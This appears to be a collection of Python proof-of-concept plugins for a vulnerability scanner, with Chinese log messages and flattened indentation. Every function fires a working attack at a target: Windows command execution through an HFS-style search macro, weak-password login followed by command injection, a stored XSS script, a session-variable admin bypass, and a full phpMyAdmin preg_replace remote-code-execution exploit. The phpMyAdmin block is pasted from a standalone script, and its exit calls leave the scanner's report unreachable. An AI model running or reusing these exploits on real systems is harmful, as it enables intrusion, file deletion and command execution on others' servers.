def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
exec_payload = "/?search==%00{.exec|cmd.exe /c del res.}{.exec|cmd.exe /c echo>res 123456test.}"
check_payload = "/?search==%00{.cookie|out|value={.load|res.}.}"
attack_url = self.target
s = requests.Session()
s.get(attack_url + exec_payload, headers={})
r = s.get(attack_url + check_payload, headers={})
check_cookie = r.headers.get('set-cookie') if r.headers.get(
'set-cookie') else ""
if "123456test" in check_cookie:
self.output.report(
self.vuln,
'发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
post_data = {'username': '******', 'password': '******'}
code_exec = {'line': '1|echo \'vuln\''}
try:
# self.vuln: 当前扫描的漏洞
# self.target: 扫描目标
path = '{url}/home/login'.format(url=self.target)
s = requests.Session()
# self.output.info: 执行日志、流程信息的打印
self.output.info('使用用户信息 {up} 访问 {path}'.format(path=path,
up=post_data))
response = s.post(path, data=post_data)
if response.text == '1':
# self.output.warn: 扫描特定漏洞发现的疑似漏洞信息打印
self.output.warn(self.vuln['auth'],
'发现弱口令 {up}'.format(up=post_data))
path = self.target + '/3g/g3/log'
self.output.info('发送 payload={0} 到 {1}'.format(
code_exec, path))
result = s.post(path, data=code_exec)
if 'vuln' in result.text:
# self.output.report: 扫描到的漏洞信息的打印
self.output.report(
self.vuln['rce'],
"目标 {url} 存在 /3g/g3/log 任意命令执行漏洞".format(
url=self.target))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
session = requests.Session()
path = '/usercpspacemanagealbum.aspx?page=1&mod=edit&albumid=32'
UA = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36'
Referer = '/usercpspacemanagealbum.aspx?page=1&mod=edit&albumid=32'
payload = '''<script>console.log(document.cookie)</script>'''
username = ''
password = ''
Host = self.target
Url = Host + path
Referer_url = self.target + Referer
Auth = requests.auth.HTTPBasicAuth(username, password)
PostData = {
'albumtitle': payload,
'albumid': '302',
'active': '',
'albumcate': '2',
'albumdescription': '',
'type': 0,
'password': '',
'Submit': '确定'}
Header = {'User-Agent': UA, 'Referer': Referer_url,
'X-Requested-With': 'XMLHttpRequest'}
# Login and get session
session.get(Url, data=PostData, auth=Auth, headers=Header)
# post editor to dz
session.post(Url, data=PostData, headers=Header)
# get result
r = session.get(
'{}/usercpspacemanagealbum.aspx'.format(Host), headers=Header)
if payload in r.text:
#args['success'] = True
#args['poc_ret']['vul_url'] = Url
self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(
target=self.target, name=self.vuln.name))
return None
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip(
'/') + '/' + (self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
postdata = "_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=300000000000000000000000\r\n"
session = requests.Session()
_req = session.post(self.target + "/index.php", data=postdata)
# login test
response = session.post(self.target+ "/admin/admin.php", data=postdata)
content = response.text
if "admin_form.php?action=form_list&nav=list_order" in content and "admin_main.php?nav=main" in content:
self.output.report(self.vuln, '发现{target}存在{name}漏洞;\n漏洞地址为{url}'.format(
target=self.target, name=self.vuln.name,url=self.target+"/admin/admin.php"))
except Exception as e:
self.output.info('执行异常{}'.format(e))
def verify(self):
self.target = self.target.rstrip('/') + '/' + (
self.get_option('base_path').lstrip('/'))
try:
self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(
target=self.target, vuln=self.vuln))
url_to_pma = self.target
payload = "system('uname -a');"
uname = ''
upass = ''
db = 'test'
token = False
custom_table = False
table = 'prgpwn'
size = 32
s = requests.Session()
# you can manually add proxy support it's very simple ;)
# s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
s.verify = False
sql = '''CREATE TABLE `{0}` (
`first` varchar(10) CHARACTER SET utf8 NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
'''.format(table)
resp = s.post(url_to_pma + "/?lang=en",
dict(pma_username=uname, pma_password=upass))
if resp.status_code is 200:
token_place = resp.text.find("token=") + 6
token = resp.text[token_place:token_place + 32]
if token is False:
# self.output.info("Cannot get valid authorization token.")
sys.exit(1)
if custom_table is False:
data = {
"is_js_confirmed": "0",
"db": db,
"token": token,
"pos": "0",
"sql_query": sql,
"sql_delimiter": ";",
"show_query": "0",
"fk_checks": "0",
"SQL": "Go",
"ajax_request": "true",
"ajax_page_request": "true",
}
resp = s.post(url_to_pma + "/import.php",
data,
cookies=requests.utils.dict_from_cookiejar(
s.cookies))
if resp.status_code == 200:
if "success" in resp.json():
if resp.json()["success"] is False:
first = resp.json(
)["error"][resp.json()["error"].find("<code>") +
6:]
error = first[:first.find("</code>")]
if "already exists" in error:
print(error)
else:
print(("ERROR: " + error))
sys.exit(1)
# build exploit
exploit = {
"db": db,
"table": table,
"token": token,
"goto": "sql.php",
"find": "0/e\0",
"replaceWith": payload,
"columnIndex": "0",
"useRegex": "on",
"submit": "Go",
"ajax_request": "true"
}
resp = s.post(url_to_pma + "/tbl_find_replace.php",
exploit,
cookies=requests.utils.dict_from_cookiejar(
s.cookies))
if resp.status_code == 200:
result = resp.json(
)["message"][resp.json()["message"].find("</a>") + 8:]
if len(result):
print(("result: " + result))
sys.exit(0)
print(
"Exploit failed!\n"
"Try to manually set exploit parameters like --table, --database and --token.\n"
"Remember that servers with PHP version greater than 5.4.6"
" is not exploitable, because of warning about null byte in regexp"
)
sys.exit(1)
self.output.report(
self.vuln, '发现{target}存在{name}漏洞'.format(target=self.target,
name=self.vuln.name))
except Exception as e:
self.output.info('执行异常:{}'.format(e))